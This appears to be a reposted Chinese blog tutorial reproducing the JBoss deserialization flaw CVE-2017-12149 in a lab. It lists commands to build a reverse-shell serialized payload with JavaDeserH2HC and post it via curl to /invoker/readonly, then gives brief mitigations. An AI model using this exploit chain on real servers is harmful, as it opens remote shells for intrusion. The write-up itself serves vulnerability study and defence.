JBoss-反序列化命令执行漏洞(CVE-2017-12149)

其他 2020-01-13 10:53:04 阅读次数: 0

复现环境

win10

kali

JavaDeserH2HC

jboss-6.0.0

影响范围

JBoss 5.0.0~5.2.2

复现过程

进入JBoss的bin目录

 

run.bat -b 0.0.0.0

访问下http://192.168.61.1:8080/

访问下http://192.168.61.1:8080/invoker/readonly

看到返回500,一般就是漏洞存在

下载利用工具:http://scan.javasec.cn/java/JavaDeserH2HC.zip

把工具放入kali中,并解压

进行文件编译

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

目录里面就会多一个

然后在输入(ip和port更改为自己的)

java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port //反弹shell的IP和端口

然后让kali进行监听

我们在向受害主机提交我们的ser文件

curl http://192.168.61.1:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

 

防御方法

建议用户升级到JBOSS AS7。另,不能及时升级的用户,可采取如下临时解决方案:

 1. 不需要 http-invoker.sar 组件的用户可直接删除此组件。

 2. 添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中:<url-pattern>/*</url-pattern> 用于对 http invoker 组件进行访问控制。

大方子
发布了156 篇原创文章 · 获赞 396 · 访问量 66万+
他的留言板 关注

猜你喜欢

转载自blog.csdn.net/nzjdsds/article/details/97765205
今日推荐
基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个!
美国拟限制 AI 大模型出口中国和俄罗斯
苹果将与 OpenAI 达成协议,将 ChatGPT 应用于 iPhone
openKylin 社区生态委员会第六次会议圆满召开
阿里云正式发布通义千问 2.5
Python 3.13 发布首个 Beta:实验性自由线程模式和 JIT、改进交互式解释器
Stack Overflow 拿我的代码去训练 AI 大模型,还封了我的账号
Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作
《2024 年一季度互联网投融资运行情况》研究报告
报告:Django 仍然是 74% 开发者的首选
15 年前上了“FFmpeg 耻辱柱”,今天他还得谢谢咱——腾讯QQPlayer一雪前耻?
TIOBE 5 月榜单:Fortran “复活”进入 Top 10
周排行
记一下去大梅沙的准备(2018-05-26)
Spring 注解 事务
基于HTTP协议的客户端缓存
阿里云rds 备份和还原
[PHP] 几个拖慢 PHP 程序/API 运行速度的点
python 代码风格------------PEP8规则
js控制json生成菜单——自制菜单(一)
将字符串: 'k:1|k1:2|k2:3|k3:4 ' ,处理成 python 字典: {'k':1, 'k1':2, ...}
微信小程序转支付宝小程序
Qt551.窗口滚动条
每日归档
更多
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)
2024-05-06(40)
2024-05-05(0)
2024-05-04(7)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022